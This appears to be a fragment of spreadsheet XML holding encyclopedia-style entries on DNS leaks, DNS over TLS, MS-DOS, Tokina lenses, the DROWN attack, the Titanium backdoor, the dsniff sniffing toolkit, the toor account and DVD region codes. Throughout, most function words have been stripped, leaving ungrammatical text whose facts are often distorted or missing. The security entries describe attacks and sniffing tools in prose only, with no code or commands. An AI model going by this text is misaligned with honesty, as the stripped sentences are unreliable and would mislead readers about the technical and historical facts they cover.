  </si>
  <si>
    <t>leak refers security flaw allows requests revealed servers, despite service attempt conceal them. although primarily concern users, also possible prevent proxy direct internet users. process vulnerability allows isp, well on-path eavesdroppers, websites user visiting. this possible browser's requests sent server directly, sent vpn. this occurs certain types vpns, e.g. "split-tunnel" vpns, traffic still sent local network interface even active. starting windows microsoft introduced "smart multi-homed named resolution". this altered windows handled requests, ensuring request could travel across available network interfaces computer. while general consensus method domain name resolution accelerated time required look-up completed, also exposed users leaks connected endpoint, computer would longer servers assigned service. instead request would sent available interfaces, thus traffic would travel tunnel expose user's default servers. prevention websites exist allow testing determine whether leak occurring. leaks addressed number ways: encrypting requests https tls, prevents requests seen on-path eavesdroppers. using client sends requests vpn. apps successfully plug leaks, found study commonwealth scientific industrial research organisation 2016 carried in-depth research called analysis privacy security risks android permission-enabled apps" found applications google play store tested leak requests. changing servers local computer whole network adapters, setting different ones. party apps available nirsoft quicksetdns. using firewall disable whole device (usually outgoing connections less commonly port 53), setting servers non-existing ones like local 127.0.0.1 0.0.0.0 (via command line party possible interface). this requires alternate ways resolving domains like mentioned ones, using apps configured proxy, using proxy helper apps like proxifier proxycap, allows resolving domains proxy. many apps allow setting manual proxy using proxy already used system. using completely anonymous browsers browser makes user anonymous, also require operating system. using proxy vpn, system wide, party helpers like proxifier, form browser extension. however extensions chrome firefox report false positive working condition even connect, party website leak check recommended. this false working state usually happens proxy extensions tried used time (e.g. windscribe foxyproxy extensions). references</t>
  </si>
  <si>
    <t>Tokina</t>
  </si>
  <si>
    <t>tokina co., ltd. (株式会社トキナー, kabushiki-gaisha tokinā) japanese manufacturer photographic lenses cctv security equipment. lens designations full frame cropped digital auto-focus at-x professional line (constant aperture zooms primes) at-x consumer line internal focus system floating element system hood (10-17mm fisheye without built-in hood)optical design: aspherical optics advanced aspherical optics super dispersion high-refraction dispersion multi-coating lenses zoom at-x fisheye 10-17mm f/3.5~4.5 (available without built-in hood. hood version used full-frame. lens also sold pentax brand.) at-x 11–16mm f/2.8 at-x 11–20mm f/2.8 (if) at-x 12–24mm (the lens also sold pentax brand) at-x 12–24mm at-x 12-28mm at-x 16-28mm f/2.8 at-x 16–50mm f/2.8 (the lens also sold pentax brand) at-x 16.5-135mm f/3.5-5.6 at-x 17-35mm 19-35mm f/3.5~4.5 (made cosina) at-x 20-35mm f/2.8 20-35mm f/3.5-4.5 (72mm filter) 20-35mm f/3.5-4.5 (77mm filter) at-x 24-40mm f/2.8 at-x 24-70mm f/2.8 at-x 24-200mm f/3.5~5.6 25-50mm at-x 28-70mm f/2.6-2.8 sz-x 28-70mm f/2.8-4.3 at-x 28–70mm f/2.8 at-x 28-70mm f/2.8 at-x 28-80mm f/2.8 sz-x 28-70mm f/3.5-4.5 at-x 28-85mm f/3.5-4.5 28-80 f/3.5-5.6 28-70mm 28-85mm at-x 28-135mm f/4-4.6 at-x 35-70mm f/2.8 35-70mm f/3.5 35-105mm f/3.5 35-105mm f/3.5-4.3 35-135mm f/4-4.5 at-x 35-200mm f/3.5-4.5 at-x 35-200mm f/3.5-4.5 35-300mm f/4.5-6.7 at-x 50–135mm f/2.8 (the lens also sold pentax brand) 50-200mm f/3.5-4.5 at-x 50-250mm f/4-5.6 at-x 60-120mm f/2.8 at-x 70-200mm vcm-s (image stabilization) 70-210mm f/3.5 70-210mm 70-220mm f/3.5 75-150mm f/3.8 75-260mm f/4.5 at-x 80-200mm f/2.8 at-x 80-200mm f/2.8 at-x 80-200mm f/2.8 80-200mm f/3.5-4.5 80-200mm f/4.0 80-200mm f/4.0 80-200mmf/4.0 80-200mm f/4.5 80-250mm f/4.5 at-x 80-400mm f/4.5-5.6 at-x 80-400mm f/4.5~5.6 90-230mm f/4.5 at-x 100-300mm at-x 100-300mm at-x 100-300mm 100-300mm 100-300mm f/5.6 at-x 150-500mm f/5.6 sz-x 28-105mm f/4-5.3 sz-x 35-200mm f/4-5.6 sz-x 70-210mm f/4-5.6 sz-x 80-200mm f/4.5 (filter 55mm) sz-x 80-200mm 4.5-5.6 (filter 49mm 52mm) prime 17mm f/3.5 at-x 17mm f/3.5 at-x 17mm f/3.5 17mm f/3.5 firin 20mm f/2.0 24mm f/2.8 24mm f/2.8 28mm 28mm f/2.8 28mm f/2.8 at-x 35mm f/2.8 macro 35mm f/2.8 opera 50mm f/1.4 at-x 90mm f/2.5 macro at-x m100 100mm f/2.8 macro (internal focus, 1:2) at-x m100 100mm f/2.8 macro 135mm f/2.8 200mm f/3.5 at-x 300mm f/2.8 at-x 300mm f/2.8 at-x 300mm f/2.8 at-x 300mm 300mm f/5.5 (preset t-mount) 300mm f/5.6 at-x 400mm f/5.6 400mm f/5.6 400mm f/5.6 400mm f/6.3 (preset t-mount) 500mm mirror t600 600mm (preset, lens head focus unit) t800 800mm (preset, lens head focus unit) also list photographic equipment makers list tokina lenses nikon f-mount integrated autofocus motor kenko (company) produces lenses tokina name references external links official homepage canon technoclopedia: tokina lenses canon lens chart technical data, comments test references, including discontinued models</t>
  </si>
  <si>
    <t>DNS over TLS</t>
  </si>
  <si>
    <t>(dot) network security protocol encrypting wrapping domain name system (dns) queries answers transport layer security (tls) protocol. goal method increase user privacy security preventing eavesdropping manipulation data man-in-the-middle attacks. while dns-over-tls applicable transaction, first standardized stub forwarding resolvers recursive resolvers, 7858 2016. subsequent ietf efforts specify recursive authoritative servers ("authoritative dns-over-tls" "adot") related implementation authoritative servers (zone transfer-over-tls "xfr-over-tls"). server software bind supports connections version 9.17. earlier versions offered capability proxying stunnel. unbound supported since january 2018. unwind supported since january 2019. with android pie's support tls, blockers support using encrypted protocol relatively easy access services versus various work-around methods typically used vpns proxy servers.simple plus, resolving authoritative server windows, added support version released september 2021. client software android clients running android (pie) newer support default network infrastructure, example isp, supports it.in april 2018, google announced android include support tls, allowing users server phone-wide wi-fi mobile connections, option historically possible rooted devices. dnsdist, powerdns, also announced support version 1.3.0.linux windows users client nlnet labs stubby daemon knot resolver. alternatively install getdns-utils directly getdns_query tool. unbound resolver nlnet labs also supports tls.apple's introduced os-level support (and https). allow manual configuration servers, requires third-party application make configuration changes.systemd-resolved linux-only implementation configured tls, editing /etc/systemd/resolved.conf enabling setting dnsovertls. most major linux distributions systemd installed default.personaldnsfilter open source filter support https (doh) java-enabled devices including android. nebulo open source changer application android supports doh. public resolvers dns-over-tls first implemented public recursive resolver quad9 2017. other recursive resolver operators google cloudflare followed suit subsequent years, broadly-supported feature generally available large recursive resolvers. criticisms implementation considerations impede analysis monitoring traffic cybersecurity purposes. used bypass parental controls operate (unencrypted) standard level; circle, parental control router relies queries check domains blocklist, blocks default this. however, providers offer filtering parental controls along support doh. scenario, queries checked block lists received provider rather prior leaving user's router. encryption protect privacy. protects third-party observers. guarantee endpoints (then decrypted) data. clients necessarily directly query authoritative name servers. client rely server using traditional (port 853) queries finally reach authoritative servers. thus, qualify end-to-end encrypted protocol, hop-to-hop encrypted used consistently. alternatives https (doh) similar protocol standard encrypting queries, differing methods used encryption delivery dot. basis privacy security, whether superior protocol exists among matter controversial debate, others argue merits either depend specific case.dnscrypt another network protocol authenticates encrypts traffic, although never proposed internet engineering task force (ietf) request comments (rfc). also dnscurve public recursive name server references external links 7858 specification transport layer security (tls) 8310 usage profiles dtls privacy project: dnsprivacy.org</t>
  </si>
  <si>
    <t>DOS</t>
  </si>
  <si>
    <t>platform-independent acronym "disk operating system" later became common shorthand disk-based operating systems compatibles. primarily consists microsoft's ms-dos rebranded version name dos, introduced 1981. later compatible systems manufacturers include (1988), rom-dos (1989), pts-dos (1993), freedos (1998). ms-dos dominated compatible market 1981 1995. dozens operating systems also acronym "dos", beginning mainframe dos/360 1966. others include apple dos, apple prodos, atari dos, commodore dos, trsdos, amigados. history origins (and separately sold ms-dos) predecessor, 86-dos, developed similar digital research's cp/m—the dominant disk operating system 8-bit intel 8080 zilog microcomputers—but instead intel 8086 16-bit processors, order easily port cp/m applications ms-dos. when introduced built intel 8088 microprocessor, needed operating system. seeking 8088-compatible build cp/m, initially approached board member mary maxwell gates' son, bill gates. sent digital research, meeting however, initial negotiations cp/m broke down: digital research wished sell cp/m royalty basis, sought single license, change name dos". digital research founder gary kildall refused, withdrew. approached bill gates. gates turn approached seattle computer products. there, programmer paterson developed variant cp/m-80, intended internal product testing scp's 16-bit intel 8086 card s-100 bus. system initially named qdos (quick dirty operating system), made commercially available 86-dos. microsoft purchased 86-dos, allegedly us$50,000. this became microsoft disk operating system, ms-dos, introduced 1981. within year microsoft licensed ms-dos companies, supplied operating system hardware, sometimes names. microsoft later required ms-dos name, exception variant. continued develop version, dos, digital research became aware operating system similar cp/m sold (under name insisted upon cp/m), threatened legal action. responded offering agreement: would give consumers choice cp/m-86, kildall's 8086 version. side-by-side, cp/m cost us$200 dos, sales low. cp/m faded, ms-dos becoming marketed operating system compatibles.microsoft originally sold ms-dos original equipment manufacturers (oems). major reason early 100% compatible. structured separation system specific device driver code (io.sys) kernel (msdos.sys). microsoft provided adaptation (oak) allowed oems customize device driver code particular system. early 1990s, adhered standards microsoft began selling ms-dos retail ms-dos 5.0. mid-1980s microsoft developed multitasking version dos. this version generally referred "european ms-dos developed licensed several european companies. this version supports preemptive multitasking, shared memory, device helper services executable ("ne") format executables. none features used later versions dos, used form basis os/2 kernel. this version distinct widely released developed based upon 3.3. digital research attempted regain market lost cp/m-86, initially concurrent dos, flexos plus (both compatible ms-dos cp/m-86 software), later multiuser (compatible ms-dos cp/m-86 software) (compatible ms-dos software). digital research bought novell, became palmdos novell dos; later, part caldera (under names opendos dr-dos 7.02/7.03), lineo, devicelogics. gordon letwin wrote 1995 "dos was, first wrote one-time throw-away product intended keep happy they'd languages". microsoft expected would interim solution xenix. company planned improve ms-dos time, would almost indistinguishable single-user xenix, xedos, would also motorola 68000, zilog z-8000, lsi-11; would upwardly compatible xenix, byte 1983 described "the multi-user ms-dos future". ibm, however, want replace dos. after at&amp;t began selling unix, microsoft began developing os/2 alternative. companies later series disagreements successor operating systems dos, os/2 windows. they split development systems result. last retail version ms-dos ms-dos 6.22; this, ms-dos became part windows last retail version 2000 (also called revision though later develop 7.10 oems internal use. freedos project began june 1994, microsoft announced would longer sell support ms-dos. hall posted manifesto proposing development open-source replacement. within weeks, programmers including villani norman joined project. kernel, command.com command line interpreter (shell), core utilities created pooling code written found available. there several official pre-release distributions freedos freedos distribution released september 2006. made available general public license (gpl), freedos require license fees royalties. decline early versions microsoft windows ms-dos. early 1990s, windows graphical shell heavy systems. 1995, windows bundled standalone operating system require separate license. windows (and windows followed took default kernel, though ms-dos component remained compatibility. with windows ms-dos component could without starting windows. with longer required windows, majority users stopped using directly. continued available compatible systems 2012 freedos, dr-dos, rom-dos, pts-dos, rxdos real/32. some computer manufacturers, including dell sell computers freedos dr-dos operating systems. embedded systems dos's structure accessing hardware directly allows used embedded devices. final versions dr-dos still aimed market. rom-dos used operating system canon powershot emulation linux, possible dosemu, linux-native virtual machine running programs near native speed. there number emulators running various versions unix microsoft windows dosbox. dosbox designed legacy gaming (e.g. king's quest, doom) modern operating systems. design ms-dos related operating systems commonly associated machines using intel compatible cpus, mainly compatibles. machine-dependent versions ms-dos produced many non-ibm-compatible x86-based machines, variations relabelling microsoft distribution manufacturer's name, versions specifically designed work non-ibm-pc-compatible hardware. long application programs used apis instead direct hardware access, could ibm-pc-compatible incompatible machines. original freedos kernel, dos-c, derived dos/nt motorola 68000 series cpus early 1990s. while systems loosely resembled architecture, applications binary compatible incompatible instruction sets non-x86-cpus. however, applications written high-level languages could ported easily. single-user, single-tasking operating system basic kernel functions non-reentrant: program time them, functionality allow program execute time. kernel provides various functions programs application program interface), like character i/o, file management, memory management, program loading termination. provides ability shell scripting batch files (with filename extension .bat). each line batch file interpreted program run. batch files also make internal commands, goto conditional statements.the operating system offers application programming interface allows development character-based applications, accessing hardware, graphics cards, printers, mice. this required programmers access hardware directly, usually resulting application device drivers hardware peripheral. hardware manufacturers would release specifications ensure device drivers popular applications available. boot sequence bootstrap loader pc-compatible computers, master boot record, located beginning boot sector, first sector first track (track zero), boot disk. bios load sector memory address 0000h:7c00h, typically check signature "55h aah" offset +1feh. sector considered valid, bios next physical disk row, otherwise jump load address certain registers loaded boot sector happens master boot record (mbr), found partitioned media, relocate 0000h:0600h memory, otherwise step skipped. code scan partition table, located within sector, active partition (modern mbrs check offset +1beh+10h*n, whereas mbrs simply check value 80h), and, found, load first sector corresponding partition, holds volume boot record (vbr) volume, memory 0000h:7c00h similar fashion loaded bios itself. pass execution loaded portion certain registers sector content loaded 0000h:7c00h constitutes now. vbrs operating system specific cannot exchanged different versions general, exact behaviour differs different versions. versions 1.x, would load whole io.sys/ibmbio.com file memory 0000h:0600h. work, sectors stored consecutive order disk sys. later issues, would locate store contents first entries root directory 0000h:0500h happen reflect correct boot files recorded vbr, would load first consecutive sectors io.sys/ibmbio.com file memory 0070h:0000h. also take care preserve contents disk parameter table (dpt). finally, passes control loaded portion jumping entry point certain registers (with considerable differences different versions). later versions, loaded first sectors io.sys/ibmbio.com file memory, loaded portion contains another boot loader, load remainder memory, using root directory information stored 0000h:0500h. versions, file contents still need stored consecutive order disk. older versions dos, still loaded whole, step skipped. system initialization code initialize built-in device drivers load kernel, located msdos.sys ms-dos systems, memory well. windows system initialization code built-in device drivers kernel combined single io.sys file msdos.sys used text configuration file. config.sys file read parse configuration parameters. shell variable specifies location shell defaults command.com. shell loaded executed. startup batch file autoexec.bat shell.the system files loaded boot sector must contiguous first directory entries. such, removing adding file likely render media unbootable. however, possible replace shell will, method used start execution dedicated applications faster. this limitation apply version dos, system files located anywhere root directory need contiguous. therefore, system files simply copied disk provided boot sector compatible already. above, system files named ibmbio.com instead io.sys ibmdos.com instead msdos.sys. older versions used drbios.sys drbdos.sys instead. starting ms-dos binary system files io.sys msdos.sys combined single file io.sys whilst msdos.sys became configuration file similar config.sys autoexec.bat. msdos.sys bootgui directive boot process stop command processor (typically command.com) loaded, instead executing win.com automatically. file system uses filesystem supports filenames: characters filename characters extension. starting hierarchical directories supported. each directory name also format maximum directory path length characters internal current directory structure (cds) tables maintains. including drive name, maximum length fully qualified filename supports characters using format drive:\path\filename.ext followed null byte. uses file allocation table (fat) filesystem. this originally fat12 supported 4078 clusters drive. added support fat16 used 16-bit allocation entries supported 65518 clusters drive. compaq ms-dos 3.31 added support fat16b removed 32‑mib drive limit could support mib. finally ms-dos (the component windows added support fat32 used 32-bit allocation entries could support hard drives beyond. starting 3.1, file redirector support added dos. this initially used support networking later used support cd-rom drives mscdex. also preliminary installable file system (ifs) support unused removed 5.0. also supported block devices ("disk drive" devices) loaded config.sys could used file system support network devices. drive naming scheme dos, drives referred identifying letters. standard practice reserve floppy drives. systems floppy drive assigns letters drive, prompting user swap disks programs alternate access them. this facilitates copying floppy floppy program floppy accessing data another. hard drives originally assigned letters "d". could support active partition drive. support hard drives became available, developed first assigning drive letter drive's active primary partition, making second pass drives allocate letters logical drives extended partition, third pass give non-active primary partitions names (where additional partitions existed contained dos-supported file system). lastly, allocates letters optical disc drives, disks, hardware. letter assignments usually occur order drivers loaded, drivers instruct assign different letter; drivers network drives, example, typically assign letters nearer alphabet.because applications drive letters directly (unlike /dev directory unix-like systems), disrupted adding hardware needs drive letter. example addition hard drive primary partition pre-existing hard drive contains logical drives extended partitions; drive assigned letter previously assigned extended partition logical drives. moreover, even adding hard drive logical drives extended partition would still disrupt letters disks optical drives. this problem persisted microsoft's dos-based versions windows replaced versions based line, preserves letters existing drives user changes them. under dos, problem worked around defining subst drive installing program logical drive. assignment drive would changed batch whenever application starts. under versions concurrent dos, well multiuser dos, system manager real/32, reserved drive letter automatically assigned corresponding load drive whenever application starts. reserved device names there reserved device names cannot used filenames regardless extension occupied built-in character devices. these restrictions also affect several windows versions, cases causing crashes security vulnerabilities.the reserved names are: con, console aux, auxiliary prn, printer nul, null devices; added 86-dos 1.10 1.0.these names (except nul) continued supported versions ms-dos, dr-dos ever since. also available versions ms-dos 1.25, whereas versions ms-dos 1.25 already used lpt1 (first line printer) com1 (first serial communication device) instead, introduced dos. addition lpt1 lpt2 well com1 com3, hewlett-packard's ms-dos 2.11 portable plus also supported alias lpt2 82164a alias com2; also supported plotters. otherwise, com2, lpt2, lpt3 clock$ (still named clock issues ms-dos 2.11) clock device introduced 2.0, com3 com4 added 3.3. only multitasking ms-dos supported keybd$ screen$. higher multiuser support $idle$ device dynamic idle detection saving power improve multitasking. lpt4 optional built-in driver fourth line printer supported versions dr-dos since 7.02. config$ constitutes real mode manager ms-dos 7.0–8.0. typically defaults com1, lpt1 (lst), defaults changed versions point serial parallel devices. reconfigurable well.filenames ended colon nul: conventionally indicate device names, colon actually part name built-in device drivers. colons necessary typed cases, example: still possible create files directories using reserved device names, direct editing directory data structures disk sectors. such naming, starting file name space, sometimes used viruses hacking programs obscure files users know access locations. memory management designed intel 8088 processor directly access maximum ram. both microsoft chose kibibytes (kib) maximum amount memory available programs reserved remaining video memory, read-only memory adapters video network peripherals, system's bios. 1985, applications already hitting memory limit, much reserved unused, depending machine's specifications.specifications developed allow access additional memory. first expanded memory specification (ems) designed allow memory add-on card accessed page frame reserved upper memory area. 80386 later systems could virtual 8086 mode (v86) mode memory manager like emm386 create expanded memory extended memory without need add-on card. second specification extended memory specification (xms) 80286 later systems. this provided copy data extended memory, access 65,520-byte high memory area directly first megabyte memory upper memory block area. generally support provided himem.sys mode memory manager like qemm 386max also supported ems.starting could directly take advantage loading kernel code disk buffers dos=high statement config.sys. also allowed available upper memory blocks dos=umb statement config.sys. os/2 windows emulation os/2 windows runs much native applications they access drives services, even host's clipboard services. because drivers file systems forth reside host system, emulation needs provide translation layer converts calls os/2 windows system calls. translation layer generally also converts bios calls virtualizes common port accesses many programs commonly use. windows virtual machine provided winoldap. winoldap creates virtual machine based program's file, system state windows loaded. graphics mode, character graphic, captured window. applications windows clipboard accessing extra published calls winoldap, paste text winoldap graphics. emulated os/2 windows based upon although default configuration (config.sys autoexec.bat), alternate files session-by-session basis. possible load drivers files access host system, although typically third-party. under os/2 later, emulation provided doskrnl. this file represents combined ibmbio.com ibmdos.com, system calls passed os/2 windowing services. programs environment, bulk utilities provided bound applications \os2 directory. os/2 windows applications using modified copy windows (win-os/2). modifications allow windows programs seamlessly os/2 desktop, start winos/2 desktop, similar starting windows dos. os/2 allows 'dos drive a:', (vmdisk). this real dos, like ms-dos 6.22 5.00. makes bootable floppy disk dos, adds number drivers os/2, creates special image. booted full access system, provides drivers hardware. disk access cdrom drives os/2 driver. 32-bit (ia-32) editions windows family since 1993, emulation provided virtual machine (ntvdm). 64-bit (ia-64) versions windows support ntvdm cannot 16-bit applications directly; third-party emulators dosbox used programs machines. user interface systems command-line interface. program started entering filename command prompt. systems include utility programs provide internal commands correspond programs.in attempt provide user-friendly environment, numerous software manufacturers wrote file management programs provided users menu- and/or icon-based interfaces. becoming self-contained program loader, replacing most-used pc-compatible program loader. text user interface programs included norton commander, navigator, volkov commander, quarterdesk desqview, sidekick. graphical user interface programs included digital research's (originally written cp/m) geos. eventually, manufacturers major systems began include environment managers. ms-dos/ibm included shell; 5.0, released following year, included viewmax, based upon gem. terminate stay resident multitasking operating system. however provide terminate stay resident (tsr) function allowed programs remain resident memory. these programs could hook system timer and/or keyboard interrupts allow tasks background invoked time preempting current running program effectively implementing simple form multitasking program-specific basis. print command implement background print spooling. borland sidekick, popup personal information manager (pim), also used technique. terminate stay resident programs also used provide additional features available default. programs like doskey provided command line editing facilities beyond available command.com. programs like microsoft cd-rom extensions (mscdex) provided access files cd-rom disks. some tsrs could even perform rudimentary form task switching. example, shareware program back forth (1990) hotkey save state currently-running program disk, load another program, switch hence possible switch "back forth" programs, albeit slowly disk access required. back forth could enable background processing however; needed desqview least 386). software arachne, 16-bit graphical browser dbase, database program harvard graphics, presentation graphics design program lotus 1-2-3, spreadsheet credited success norton commander xtree, file management utilities pkzip, compression utility quickly became standard file compression procomm, qmodem, telix, modem communication programs sidekick, personal information manager could used within programs wordperfect, word processor dominant 1980s wordstar, word processor originally cp/m became popular development tools basic language interpreters. basica gw-basic djgpp, 32-bit dpmi port microsoft macro assembler, microsoft codeview microsoft watcom c/c++ watcom turbo pascal, turbo basic, turbo turbo prolog, turbo assembler borland also command.com (the command line interpreter windows cp/m (digital research early operating system similar dos) disk control program (dcp, ms-dos derivative former east-german robotron) dos/v index games list operating systems pc-mos/386 dos-compatible multiuser operating system) vga-compatible text mode, base dos's compatibles references further reading corp., ibm, (january 1984). "ibm release 2.10 cloth bound retail hard board box". edition. corp. item number. 6183946 corp., ibm, (january 1984). "disk operating system user's guide (dos release 2.10)". edition. microsoft corp. (100 pages including colour illustrations) item number. 6183947 corp., ibm, (january 1984). "disk operating system manual (dos release 2.10)". edition. microsoft corp. (574 looseleaf pages ring folder) item 6183940 mueller, scott (1998). upgrading repairing (eighth ed.). publishing. isbn 0-7897-1295-4. retrieved 2021-11-02. bailes, lenny; mueller, john (1992). memory management multitasking beyond 640k. mcgraw-hill. isbn 0-8306-3476-2. retrieved 2021-11-02. external links origins dos, articles manuals paterson. timeline windows versions wayback machine (archived 2007-10-28) "dos hardware limit". archived original 2010-08-15. retrieved 2010-08-29. batfiles: batch file programming handbook "application software short file name family". www.jumpjet.info. retrieved 2020-02-07. "(...) archive carefully hand selected free [and abandoned] software dos."</t>
  </si>
  <si>
    <t>DROWN attack</t>
  </si>
  <si>
    <t>drown (decrypting obsolete weakened encryption) attack cross-protocol security attacks servers supporting modern sslv3/tls protocol suites using support obsolete, insecure, protocol leverage attack connections using up-to-date protocols would otherwise secure. drown affect types servers offer services encrypted sslv3/tls still support sslv2, provided share public credentials protocols. additionally, public certificate used different server supports sslv2, server also vulnerable sslv2 server leaking information used server.full details drown announced march 2016, along patch disables sslv2 openssl; vulnerability assigned cve-2016-0800. patch alone sufficient mitigate attack certificate found another sslv2 host. viable countermeasure disable sslv2 servers. researchers estimated https sites affected vulnerability march 2016. details drown acronym "decrypting obsolete weakened encryption". exploits vulnerability combination protocols used configuration server, rather specific implementation error. according discoverers, exploit cannot fixed making changes client software browsers.the exploit includes chosen-ciphertext attack sslv2 server bleichenbacher oracle. sslv2 worked encrypting master secret directly using rsa, 40-bit export ciphersuites worked encrypting 40-bit master secret revealing 88-bits plaintext. 48-byte sslv3/tls encrypted ciphertext "trimmed" 40-bit parts used sslv2 clientmasterkey message server treats 40-bit part sslv2 master secret (the bits value sent client plaintext). brute forcing 40-bit encryption serververify message used oracle. proof-of-concept attack demonstrated multi-gpu configurations commercial cloud computing could perform part codebreaking calculations, cost around $18,000 setup per-attack cost $400 cloud. successful attack provide session captured handshake. investigators, described attack general drown attack also found specific weakness openssl implementation sslv2 allowed called special drown attack. this vastly reduced effort required break encryption, making real-time man-in-the-middle attacks possible required modest computing resources. openssl implementation sslv2 2015 check clear encrypted lengths correct, allowing example 8-bit master secret encrypted. until 2015, openssl would also overwrite wrong bytes sslv2 master secret attempt bleichenbacher countermeasure. until 2016, openssl would also happily negotiate disabled sslv2 ciphersuites. unlike sslv3 later, sslv2 client supposed choose list ciphersuites offered server openssl would allow unlisted ciphersuites. original reporters security researchers nimrod aviram sebastian schinzel. mitigation protect drown, server operators need ensure private keys used anywhere server software allows sslv2 connections. this includes servers, smtp servers, imap servers, software supports ssl/tls.the openssl group released security advisory, patches intended mitigate vulnerability removing support obsolete protocols ciphers. however, server's certificate used servers support sslv2, still vulnerable, patched servers. numerous sources recommended vulnerability patched soon possible site operators. references external links official website technical paper list security notices</t>
  </si>
  <si>
    <t>Titanium (malware)</t>
  </si>
  <si>
    <t>titanium advanced backdoor malware apt, developed platinum, cybercrime collective. malware uncovered kaspersky reported november 2019. according global security mag, "titanium includes complex sequence dropping, downloading installing stages, deployment trojan-backdoor final stage." much sequence hidden detection sophisticated manner, including hiding data steganographically image. announcement report, kaspersky concluded: "the titanium complicated infiltration scheme. involves numerous steps requires good coordination them. addition, none files file system detected malicious encryption fileless technologies. feature makes detection harder mimicking well-known software. regarding campaign activity, detected current activity november 2019] related titanium apt." also serial timeline notable computer viruses worms references external links kaspersky</t>
  </si>
  <si>
    <t>DSniff</t>
  </si>
  <si>
    <t>dsniff password sniffing network traffic analysis tools written security researcher startup founder song parse different application protocols extract relevant information. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, webspy passively monitor network interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, macof facilitate interception network traffic normally unavailable attacker (e.g., layer-2 switching). sshmitm webmitm implement active man-in-the-middle attacks redirected https sessions exploiting weak bindings ad-hoc pki. overview applications sniff usernames passwords, pages visited, contents email, etc. name implies, dsniff network sniffer, also used disrupt normal behavior switched networks cause network traffic hosts network segment visible, traffic involving host dsniff running handles ftp, telnet, smtp, http, pop, poppass, nntp, imap, snmp, ldap, rlogin, rip, ospf, pptp ms-chap, nfs, vrrp, yp/nis, socks, x11, cvs, irc, aim, icq, napster, postgresql, meeting maker, citrix ica, symantec anywhere, sniffer, microsoft smb, oracle sql*net, sybase microsoft protocols. name "dsniff" refers package well included tool. "dsniff" tool decodes passwords sent cleartext across switched unswitched ethernet network. page explains song wrote dsniff "honest intentions audit network, demonstrate insecurity cleartext network protocols." requests, "please abuse software." these files configured dsniff folder /etc/dsniff/ /etc/dsniff/dnsspoof.hosts sample hosts file. host file specified, replies forged address queries answer local machine’s address./etc/dsniff/dsniff.magic network protocol magic/etc/dsniff/dsniff.services default trigger tablethe page dsniff explains flags. learn using dsniff, explore linux page.this list descriptions various dsniff programs. this text belong dsniff “readme” written author, song. also comparison packet analyzers etherape, network mapping tool relies sniffing traffic netsniff-ng, free linux networking toolkit network ngrep, tool match regular expressions within network packet payloads tcpdump, packet analyzer tcptrace, tool analyzing logs produced tcpdump wireshark, based alternative tcpdump references external links official website dunston, duane, linuxsecurity.com, “and away spoof!!!” http://www.linuxsecurity.com/docs/pdf/dsniff-n-mirror.pdf</t>
  </si>
  <si>
    <t>Toor (Unix)</t>
  </si>
  <si>
    <t>toor, word "root" spelled backwards, alternative superuser account unix-like operating systems, particularly variants. purpose unix, traditional keep root filesystem small reasonably possible, moving larger programs rapidly changing data other, optional parts system. this increases likelihood system brought semi-usable state case partial system failure. also means superuser account, necessary repairing broken system, depend programs outside small core. end, root account often configured shell small, efficient, dependable, awkward daily use. toor account intended solution problem. identical root, configured different, featureful shell. alternately, toor configured emergency shell, allowing root freedom featureful one. implementation unix-like system, user user number, kernel uses distinguish users manage user permissions. user reserved superuser account, given permission anything system. users username, number, user's choice login shell also managed name. this separation name number allows given user associated username, shell. security considerations presence 'toor' account presence account user triggers warning many security auditing systems. this valuable, since system administrator intend second superuser account, mean system compromised. argued even intentional 'toor' account security risk, since provides second point attack someone trying illicitly gain superuser privileges system. however, passwords chosen guarded carefully, risk increase minimal. example, netbsd ships disabled 'toor' account, meaning password system 'toor'. this security risk itself, though generate security warnings previously described. however, system compromised, administrator less likely notice enabling disabled account creation one, especially become accustomed ignoring warnings 'toor' (arguably misconfigured) security program. references</t>
  </si>
  <si>
    <t>DVD region code</t>
  </si>
  <si>
    <t>region codes digital rights management technique introduced 1997. designed allow rights holders control international distribution release, including content, release date, price, according appropriate region. this achieved region-locked players, play back dvds encoded region (plus without region code). american copy control association also requires player manufacturers incorporate regional-playback control (rpc) system. however, region-free players, ignore region coding, also commercially available, many players modified region-free, allowing playback discs.dvds code, multiple codes (multi-region), codes (region free). region codes countries combination regions applied single disc. example, designated region suitable playback europe, latin america, oceania, region region area. so-called "region "all" discs meant playable worldwide. term "region also describes players designed modified incorporate regions 1–8, thereby providing compatibility discs, regardless region. this apparent solution popular early days format, studios quickly responded adjusting discs refuse play machines implementing system known "regional coding enhancement" (rce). dvds sold baltic states region codes, previously region (due history part ussr) single market concerning free movement goods caused switch region european region dvds sub-coded "d1" "d4". "d1" releases; "d2" "d3" sold ireland; "d4" distributed throughout europe. overseas territories united kingdom france (both region often regions depending geographical situation) homelands. most dvds sold mexico rest latin america carry region codes. some region 2006 coincide blu-ray region egypt, eswatini, lesotho, south africa region african countries region african countries blu-ray region code (region north korea south korea different region codes (north korea: region south korea: region blu-ray region code (region china, region codes used: mainland china uses region hong kong macau region there also blu-ray regions used: mainland china uses region hong kong macau region most dvds india combine region region region codes, region region-code enhanced region-code enhanced, also known "rce" "rea", retroactive attempt prevent playing region's discs another region, even disc played region-free player. scheme deployed handful discs. disc contained main program material region coded region also contained short video loop world showing regions, coded region intention disc played non-region player, player would default playing material native region. this played aforementioned video loop map, impossible escape from, user controls disabled. scheme fundamentally flawed, region-free player tries play disc using last region worked previously inserted disc. cannot play disc, tries another region found works. could defeated briefly playing "normal" region disc, inserting protected region disc, would play. also caused problems genuine region players. many "multi-region" players defeated regional lockout automatically identifying matching disc's region code allowing user manually select particular region. some manufacturers players freely supply information disable regional lockout, recent models, appears disabled default. computer programs shrink, digiarty winx ripper platinum make copies region-coded dvds without restriction. purpose purpose region coding controlling release dates. practice movie marketing threatened advent digital home video tradition releasing movie cinemas general rental sale later countries others. this practice historically common advent digital cinema, releasing movie time worldwide used prohibitively expensive. most importantly, manufacturing release print film public exhibition cinema always expensive, large number release prints needed narrow window time first weeks film's release. spreading release dates allows reuse release prints regions. videotapes inherently regional since formats match encoding system used television stations particular region, ntsc pal, although early 1990s machines increasingly offered ntsc playback. dvds less restricted sense. region coding allows movie studios better control global release dates dvds. also, copyright title held different entities different territories. region coding enables copyright holders (attempt prevent region derive royalties played player inside region. region coding attempts dissuade importing dvds region another. pal/secam ntsc dvds also formatted conflicting regional television systems: 480i/60 576i/50 analog contexts often referred 525/60 (ntsc) 625/50 (pal/secam) respectively. strictly speaking, secam analog color television signal formats relevance digital domain evident conflation secam, actually distinct analog color systems). however, system originally designed encode information necessary reproduce signals formats, terms 